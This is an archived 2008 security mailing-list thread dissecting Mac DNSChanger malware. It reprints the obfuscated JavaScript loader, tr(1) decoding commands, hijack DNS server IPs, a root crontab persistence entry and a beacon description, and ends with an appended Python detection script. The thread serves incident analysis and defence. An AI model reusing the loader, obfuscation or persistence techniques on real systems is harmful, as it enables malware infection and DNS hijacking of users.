[nsp-sec] [ OT ] MacOS X malware

David Freedman david.freedman at uk.clara.net
Wed Apr 2 16:22:28 EDT 2008


I think there is a very valid point here, RBLs maintain lists of varying levels of "questionability" which are implemented on
an entirely "opt-in" basis, whereby if you do not agree with the listing you simply do not use the list.

I suggest Cymru adopt a similar set of "more questionable" feeds which we can choose to use or not (providing we don't complain about what is on them or ask for anything to be removed without a damn good reason).

Dave.

------------------------------------------------
David Freedman
Group Network Engineering 
Claranet Limited
http://www.clara.net



From: Rob Thomas
Sent: Wed 4/2/2008 21:19
To: Brian Eckman
Cc: nsp-security at puck.nether.net
Subject: Re: [nsp-sec] [ OT ] MacOS X malware


----------- nsp-security Confidential --------

Thanks, Brian!

Wise call on the null routing.  Must...avoid...altering...the DDoS-RS...  ;)


Brian Eckman wrote:
> Rob,
> 
> I'm sure this isn't news to you, but it might help clarify things for 
> others. This is the Mac equivalent of Zlob (aka generically as 
> DNSChanger). The two DNS servers given to infected hosts will be within 
> the 85.255.112.0/20 network - I think almost always within 
> 85.255.112.0/22. Based on my observations, I'd guarantee there are over 
> 229 infected Macs in Minnesota alone, not to mention 50x that in Windows 
> boxes.
> 
> I've heard other rumors (besides the livejournal link you provided) that 
> RBN is involved with Zlob, but I've never heard more than highly 
> speculative comments. Regardless, the folks behind this line of malware 
> are clearly very well funded and well organized. It's getting disgusting 
> how long this line of malware has been around and how many *millions*[1] 
> of hosts have been infected, and yet there is little to no press 
> attention given to it (and who knows how much/little LE attention). They 
> own a massive number of domains, generate a huge quantity of malware, 
> make millions off of numerous bogus anti-spyware programs (almost 
> certainly created in house) as well as large commissions from some 
> gray-ish anti-spyware, and historically, even commissions from affiliate 
> networks such as (but not limited to) amazon.com's "Associates" program.
> 
> We have been null routing 85.255.112.0/20 for nearly two years now, as 
> well as some other Intercage IP space.
> 
> Cheers,
> Brian
> 
> [1] 
> http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx 
> provides some reference as to how big the Zlob problem is. One week 
> after the Sept, 2007 MSRT was released, the Zlob family had been removed 
> from 664,258 machines. This was the same month MSRT first got rid of 
> Storm; that was removed from 274,372 machines in the same time period. 
> Granted, Zlob had about a two year head start... (But I wonder how many 
> infected machines had already been cleaned/reinstalled/recycled by then?)
> 
> Rob Thomas wrote:
>> ----------- nsp-security Confidential --------
>>
>> Hi, team.
>>
>> Given the large number of Mac users in this community, and given that 
>> this collection of dodgy web sites are infecting Windows and MacOS X, 
>> I thought this was reasonably appropriate for this list.  Some folks 
>> on this list might want to take action against some of these IPs.
>>
>> Yes it's true - there is malware for the MacOS X platform.  While this
>> report will cover a recent release, the malware itself isn't new and
>> hacking MacOS X isn't new, either.
>>
>> You can read a public blog post and some useful follow-ups at the
>> following URL:
>>
>>     <http://tacit.livejournal.com/238112.html>
>>
>> Here is our analysis.  Some of these links are rude even in name, and
>> all of them are unsafe.
>>
>> The fun begins with at least one porn site.  The site brings the user
>> through a few redirects to a site here:
>>
>>     88.85.72.147
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     35415   | 88.85.72.147     | 88.85.64.0/19       | NL | ripencc  | 2006-02-08 | WEBAZILLA WebaZilla European Network
>>
>> The page there loads some fun Javascript:
>>
>>     var str=["332", "331", "331", "331", "440", "419", "436",
>>     "354", "434", "433", "440", "383", "370", "381", "332",
>>     "331", "331", "331", "424", "439", "432", "421", "438",
>>     "427", "433", "432", "354", "443", "441", "439", "427",
>>     "422", "420", "430", "444", "433", "427", "362", "435",
>>     "439", "423", "436", "443", "363", "445", "332", "331",
>>     "331", "331", "331", "441", "427", "432", "422", "433",
>>     "441", "368", "430", "433", "421", "419", "438", "427",
>>     "433", "432", "383", "361", "426", "438", "438", "434",
>>     "380", "369", "369", "430", "419", "432", "422", "427",
>>     "432", "425", "426", "419", "430", "430", "368", "421",
>>     "433", "431", "369", "427", "432", "368", "421", "425",
>>     "427", "385", "373", "361", "381", "332", "331", "331",
>>     "331", "447"];
>>     var temp='';
>>     var gg='';
>>     for (i=0; i<str.length; i++){
>>        gg=str[i]-322;
>>        temp=temp+String.fromCharCode(gg);
>>     }
>>     eval(temp);
>>
>> This translates to (I've heavily obfuscated the URL below):
>>
>>     var pov=0;
>>     function ywuidblzoi(query){
>>        window.location='h x x p : / / landinghall . com / in.cgi?3';
>>     }
>>
>> The host landinghall.com resolves to 88.214.202.180, located at the
>> following provider:
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     23393   | 88.214.202.180   | 88.214.192.0/18     | GB | ripencc  | 2006-01-18 | ISPRIME - ISPrime, Inc.
>>
>> In addition to the malware, the images are extremely graphic.  
>> Consider yourself warned.
>>
>> The web site determines the visitor's OS and then decides which malware
>> to offer.  This is masked as a video codec to play the porn
>> available on this "PornTube" (their name) site.
>>
>> Note well that if the browser has pop-ups blocked, there is no risk to
>> MacOS X users so far as we can discern.
>>
>> At this point the MacOS X user is prompted to download a disk image for
>> installation.  This image is named 1023.dmg and is served from:
>>
>>     64.28.178.27, 64-28-178-27-rev.cernel.net
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     27595   | 64.28.178.27     | 64.28.176.0/20      | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The MacOS X user *must* provide his or her password to enable the
>> installation of this malware masked as a video player.  This is not a
>> 0day attack - it is social engineering.
>>
>> The preinstall and preupgrade scripts are the same and contain 25 lines.
>> Both use an interesting obfuscation technique - the Unix tr(1) command.
>>
>> The script first cat(1)'s itself and pipes the bottom 23 lines of itself
>> through tr(1).  The first tr(1) round does the following (I've cleaned
>> this up a bit to make it more legible):
>>
>>     tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
>>
>> It next sets two variables:
>>
>>     s1 = cx.zxx.aas.xd
>>     s2 = cx.zxx.aaz.ace
>>
>> The script called "1" is now run with these two variables as arguments,
>> piped through tr(1) again (line split to make it more legible):
>>
>>     sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
>>     `echo $s2| tr qazwsxedcr 0123456789`
>>
>> The tr(1) command translates those two "strings" into the following two
>> IP addresses:
>>
>>     s1 = 85.255.114.57
>>     s2 = 85.255.112.186
>>
>> Those IPs belong to:
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     27595   | 85.255.114.57    | 85.255.114.0/23     | UA | ripencc  | 2005-06-16 | INTERCAGE - InterCage, Inc.
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     36445   | 85.255.112.186   | 85.255.112.0/24     | UA | ripencc  | 2005-06-16 | CERNEL-ASN - Cernel, Inc
>>
>> The script called "1" looks for some basic IPv4 settings on the Mac.
>> It then replaces the DNS name servers in the netinfo database with
>> 85.255.114.57 and 85.255.112.186.  Any DNS queries from the compromised
>> Mac are now sent to these two name servers.
>>
>> Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
>>
>> These IPs are no stranger to badness.  We count 17 distinct samples in
>> our malware menagerie that reference 85.255.114.57.  The host at
>> 85.255.112.186 has been involved with at least 60 malware samples that
>> hijack DNS settings.
>>
>> If a query is made for a non-existent DNS RR, these DNS name servers
>> return an answer of 64.28.185.108.
>>
>>     64.28.185.108, 64-28-185-108-rev.cernel.net
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     27595   | 64.28.185.108    | 64.28.176.0/20      | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The script then installs itself into root's crontab as:
>>
>>     * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
>>
>> By default there is no root crontab on MacOS X, so this one really
>> stands out.
>>
>> The QuickTime.xpt script is just a copy of the "1" script.  This will
>> now run once per minute, as root, ensuring the malware and the DNS
>> changes aren't removed or lost for long.
>>
>> A Perl script named "sendreq" is run and deleted.  This script is a
>> beacon, sending the output of "uname -p" (the machine processor
>> architecture name, e.g. "i386") and the hostname(1) command to a web
>> server.  The web server is:
>>
>>     64.28.188.220, 64-28-188-220-rev.cernel.net
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
>>     27595   | 64.28.188.220    | 64.28.176.0/20      | US | arin     | 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> This is done as an HTTP GET command from the compromised Mac, with the
>> Accept-Language: field set to the information obtained from the
>> uname(1) and hostname(1) commands run on the compromised Mac.
>>
>> We see at least 227 victims, mostly in the US.
>>
>> Thanks,
>> Rob.

-- 
Rob Thomas
Team Cymru
The WHO and WHY team
http://www.team-cymru.org/
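The two decoding steps in Rob's analysis above (the charCode-minus-322 JavaScript loader and the tr(1) letter-to-digit substitution) and the indicators it reports (resolvers inside 85.255.112.0/20, an every-minute root crontab entry, a beacon that stuffs uname/hostname output into Accept-Language) are pulled together below as a defender-side Python check. This is an added example, not code from the thread, from Team Cymru or from the malware itself; the crontab text and the Accept-Language values it is run over are constructed samples, and only the URL-free head of the quoted JavaScript array is reused.

```python
"""Re-implementation of the decoding steps described in the analysis, plus
checks for the indicators it lists. Added example; the sample crontab and
Accept-Language values below are constructed, not captured."""
import ipaddress
import re

# First fourteen entries of the JavaScript array quoted in the analysis.  The
# loader subtracts 322 from each value and passes it to String.fromCharCode.
JS_ARRAY_HEAD = ["332", "331", "331", "331", "440", "419", "436",
                 "354", "434", "433", "440", "383", "370", "381"]


def decode_charcode_array(values, offset=322):
    """Equivalent of the loader's for-loop, without the trailing eval()."""
    return "".join(chr(int(v) - offset) for v in values)


def tr(text, set1, set2):
    """Character-for-character substitution: the equal-length tr(1) case that
    the preinstall script uses in both of its rounds."""
    if len(set1) != len(set2):
        raise ValueError("this helper only models equal-length tr sets")
    return text.translate(str.maketrans(set1, set2))


# Second tr(1) round from the script: letters to digits.
TR_DIGITS = ("qazwsxedcr", "0123456789")


def decode_resolver(obfuscated):
    """Turn a string like 'cx.zxx.aas.xd' back into the dotted-quad it hides."""
    addr = tr(obfuscated, *TR_DIGITS)
    return str(ipaddress.ip_address(addr))  # raises ValueError if not an IP


# Prefix Brian reports null-routing; both hijack resolvers sit inside it.
HIJACK_PREFIX = ipaddress.ip_network("85.255.112.0/20")


def suspicious_resolvers(resolvers):
    """Return the configured DNS servers that fall in the DNSChanger prefix."""
    return [r for r in resolvers if ipaddress.ip_address(r) in HIJACK_PREFIX]


def every_minute_entries(crontab_text):
    """Commands scheduled '* * * * *'.  A stock MacOS X box has no root
    crontab at all, so any hit here deserves a look."""
    hits = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 5)
        if len(fields) == 6 and fields[:5] == ["*"] * 5:
            hits.append(fields[5])
    return hits


# A genuine Accept-Language value is a comma-separated list of language tags
# (or "*") with optional q-values.  The beacon puts "uname -p" output and the
# hostname there instead, which no language tag grammar accepts.
_LANG_TAG = r"(\*|[A-Za-z]{1,8}(-[A-Za-z0-9]{1,8})*)"
_QVALUE = r"(\s*;\s*q=0?\.?\d*)?"
_ACCEPT_LANGUAGE_RE = re.compile(
    r"^\s*" + _LANG_TAG + _QVALUE + r"(\s*,\s*" + _LANG_TAG + _QVALUE + r")*\s*$"
)


def accept_language_is_anomalous(value):
    """True when the header value cannot be a list of language tags."""
    return _ACCEPT_LANGUAGE_RE.match(value) is None


if __name__ == "__main__":
    print(repr(decode_charcode_array(JS_ARRAY_HEAD)))
    for s in ("cx.zxx.aas.xd", "cx.zxx.aaz.ace"):
        print(s, "->", decode_resolver(s))
    print(suspicious_resolvers(["8.8.8.8", "85.255.114.57", "85.255.112.186"]))
    # Constructed root crontab modelled on the entry quoted in the analysis.
    sample_crontab = ("* * * * * /Library/Internet Plug-Ins/QuickTime.xpt "
                      ">/dev/null 2>&1\n0 3 * * * /usr/sbin/periodic daily\n")
    print(every_minute_entries(sample_crontab))
    # Constructed header values: a normal browser and a beacon-shaped one.
    for v in ("en-US,en;q=0.5", "i386 mymac.local"):
        print(repr(v), "anomalous:", accept_language_is_anomalous(v))
```

The resolver check is the cheapest of these to deploy fleet-wide (compare each Mac's configured name servers against the prefix), while the Accept-Language test is meant for proxy or web-server logs, where a value that is not a language tag list is a strong signal regardless of which destination it was sent to.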



_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________


